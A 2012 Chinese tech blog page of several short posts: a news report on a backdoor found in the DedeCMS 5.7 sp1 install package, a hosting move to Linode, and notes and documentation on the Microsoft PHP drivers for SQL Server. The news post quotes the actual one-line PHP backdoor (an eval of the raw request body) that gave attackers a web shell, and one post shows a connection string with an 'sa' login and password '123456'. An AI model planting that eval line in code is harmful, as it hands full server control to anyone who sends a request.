Submitted by gouki on 2012, March 22, 9:54 PM
看到这个标题的时候,我真的很震惊啊。
新闻内容很短,但很让人震惊,开源软件在国内已经沦落到这种地步了吗?不过,真要说dede开源也不是特别好认为,虽然代码是开源的,但其实并没有很多人为它做过贡献,而在国外,开源软件都代表了很多人参与,国内,果然还是不劳而获的人更多啊。否则象这种问题早就被人发现了。因为没有类似象SVN的工具,谁也不知道究竟这段代码是谁上传的,如果你的项目扔在google code等托管平台上,早就被N个人发现了吧。
---------------
网易科技讯 3月22日消息,瑞星与360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。
据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。
安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码 “@eval(file_get_contents('php://input'));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的 数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等 信息。(易科)
Tags: 行业新闻
Misc | 评论:0
| 阅读:13289
Submitted by gouki on 2012, March 21, 9:57 PM
本来我是很讨厌一直迁移的,但burst一直无故挂掉,实在受不了。
一咬牙就换到了linode上面了,用ping.chinaz.com试了一下,好象电信访问的速度都比较慢,但联通线路却很快。(不过我在公司的电信光纤在最快的时候达到了100ms以下)
家里的网络是长宽,也很快,一下子欣慰了。
直接用Scp将burst的数据抓回来,很快,一下子就转换过来了。
准备向burst申请退款,NND。
Misc | 评论:2
| 阅读:18450
Submitted by gouki on 2012, March 20, 11:05 PM
http://www.microsoft.com/download/en/confirmation.aspx?id=20098
其实在很久前就有这玩意了,现在居然是3.0了。在win下用这个驱动好啊,支持最新的Sql server,而且速度很快。同时,它居然还支持了PDO。。。
下载下来很方便,有几种不同的文件,根据你当前的情况来设置:
Perform the following steps to download and install the Microsoft Drivers for PHP for SQL Server:
1. Download SQLSRV30.EXE to a temporary directory
2. Run SQLSRV30.EXE
3. When prompted, enter the path to the PHP extensions directory
4. After extracting the files, read the Installation section of the SQLSRV30_Readme.htm file for next steps
看着readme一步一步就Over了。
08年的时候根据第一版的文件写过一个很简单的连接库,替换掉了当时discuz的sql连接库。现在。。。还是用PDO吧
Tags: phpsqlsrv, windows, php
PHP | 评论:0
| 阅读:15180
Submitted by gouki on 2012, March 20, 5:25 PM
Conn2.Open "Provider=SQLOLEDB.1;Persist Security InFso=true;Data Source=192.168.1.2;Initial Catalog=xxxxx;User ID=sa;Password=123456;"
一些参考信息:
Integrated Security默认值是False,此时需要提供Uid和Pwd,即将以Sql Server 用户身份登陆数据库;如果设置为True,Yes 或 SSPI,这不能出现Uid和Pwd,将以Windows用户省份登陆数据库。强烈推荐用后一种形式,安全性更高。
参见
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemDataSqlClientSqlConnectionClassConnectionStringTopic.asp
--------
http://expert.csdn.net/Expert/topic/2930/2930660.xml?temp=.423382
Persist Security Info 布尔类型,为True时,表明采用集成安全机制;若为False,则表明不采用集成安全机制。
更多资料还是看:http://connectionstrings.com/,还是这个网站好玩。
Tags: sqlserver
DataBase | 评论:0
| 阅读:15509
Submitted by gouki on 2012, March 19, 9:28 PM
Introduction
PDO_SQLSRV is a driver that implements the PHP Data Objects (PDO) interface to enable access from PHP to MS SQL Server (starting with SQL Server 2005) and SQL Azure databases.
Installation
The PDO_SQLSRV extension is enabled by adding appropriate DLL file to your PHP extension directory and the corresponding entry to the php.ini file. The PDO_SQLSRV download comes with several driver files. Which driver file you use will depend on 3 factors: the PHP version you are using, whether you are using thread-safe or non-thread-safe PHP, and whether your PHP installation was compiled with the VC6 or VC9 compiler. For example, if you are running PHP 5.3, you are using non-thread-safe PHP, and your PHP installation was compiled with the VC9 compiler, you should use the php_pdo_sqlsrv_53_nts_vc9.dll file. (You should use a non-thread-safe version compiled with the VC9 compiler if you are using IIS as your web server). If you are running PHP 5.2, you are using thread-safe PHP, and your PHP installation was compiled with the VC6 compiler, you should use the php_pdo_sqlsrv_52_ts_vc6.dll file.
For more information about system requirements, see » SQLSRV System Requirements.
The PDO_SQLSRV extension is only compatible with PHP running on Windows. For Linux, see ODBC and » Microsoft's SQL Server ODBC Driver for Linux.
System Requirements (Microsoft Drivers for PHP for SQL Server)
To access data in a SQL Server 2005 or later database using the Microsoft Drivers for PHP for SQL Server, you must have the following components installed on your computer:
-
Supported operating systems for version 3.0 of the driver include:
-
Supported operating systems for version 2.0 of the driver include:
-
Supported operating systems for version 2.0 of the driver include:
-
Windows Server 2003 Service Pack 1
-
Windows XP Service Pack 3
-
Windows Vista Service Pack 1 or later
-
Windows Server 2008
-
Windows Server 2008 R2
-
Windows 7
-
PHP 5. For information about how to download and install the latest stable binaries, visit http://php.net.
Microsoft Drivers for PHP for SQL Server, version 3.0 requires PHP 5.3.0 or later. If possible, use PHP 5.3.6, or later. The version 2.0 driver works with PHP 5.2.4 or later. If possible, use PHP 5.2.13, or later.
-
A version of the driver file must be in your PHP extension directory. See Driver Versions later in this topic for information about the different driver files. See Loading the Microsoft Drivers for PHP for SQL Server for information on configuring the driver for the PHP runtime.
(See The Data Center for the Microsoft Drivers for PHP for SQL Server for information on where to download the Microsoft Drivers for PHP for SQL Server.)
-
A Web server. Your Web server must be configured to run PHP. For information about hosting PHP applications with Internet Information Services (IIS) 6.0, see Using FastCGI to Host PHP Applications on IIS 6.0. For information about hosting PHP applications with IIS 7.0, see Using FastCGI to Host PHP Applications on IIS 7.0.
The Microsoft Drivers for PHP for SQL Server has been tested using IIS 6 and IIS 7 with FastCGI.
-
The x86 version of SQL Server Native Client is required on the computer where PHP is running. If you are using a 64-bit operating system, the x86 version of SQL Server Native Client will be installed with the x64 version of SQL Server Native Client (do not install the x86 version of SQL Server Native Client on an x64 operating system).
If you are using the SQLSRV driver, sqlsrv_client_info will return information about which version of SQL Server Native Client is being used by the Microsoft Drivers for PHP for SQL Server. If you are using the PDO_SQLSRV driver, you can use PDO::getAttribute to discover the version.
This section lists the drivers that are installed for version 2.0 and version 3.0 of the Microsoft Drivers for PHP for SQL Server. PHP version 5.2 is not supported in version 3.0 of the Microsoft Drivers for PHP for SQL Server.
Follow the installation instructions in Loading the Driver to configure the driver for use with the PHP runtime.
Microsoft Drivers 2.0 for PHP for SQL Server installs several versions of the driver:
|
Driver file
|
PHP version
|
Thread safe?
|
Use with PHP .dll
|
|
php_sqlsrv_53_nts_vc6.dll
php_pdo_sqlsrv_53_nts_vc6.dll
|
5.3
|
no
|
php5.dll
|
|
php_sqlsrv_53_nts_vc9.dll
php_pdo_sqlsrv_53_nts_vc9.dll
|
5.3
|
no
|
php5.dll
|
|
php_sqlsrv_53_ts_vc6.dll
php_pdo_sqlsrv_53_ts_vc6.dll
|
5.3
|
yes
|
php5ts.dll
|
|
php_sqlsrv_53_ts_vc9.dll
php_pdo_sqlsrv_53_ts_vc9.dll
|
5.3
|
yes
|
php5ts.dll
|
|
php_sqlsrv_52_nts_vc6.dll
php_pdo_sqlsrv_52_nts_vc6.dll
|
5.2
|
no
|
php5.dll
|
|
php_sqlsrv_52_ts_vc6.dll
php_pdo_sqlsrv_52_ts_vc6.dll
|
5.2
|
yes
|
php5ts.dll
|
If the name of the driver file contains "vc9", it should be used with a PHP version compiled with Visual C++ 9.0.
Microsoft Drivers 3.0 for PHP for SQL Server installs several versions of the driver:
|
Driver file
|
PHP version
|
Thread safe?
|
Use with PHP .dll
|
|
php_sqlsrv_53_nts.dll
php_pdo_sqlsrv_53_nts.dll
|
5.3
|
no
|
php5.dll
|
|
php_sqlsrv_53_ts.dll
php_pdo_sqlsrv_53_ts.dll
|
5.3
|
yes
|
php5ts.dll
|
Tags: sqlserver, microsoft, pdo
PHP | 评论:0
| 阅读:20455
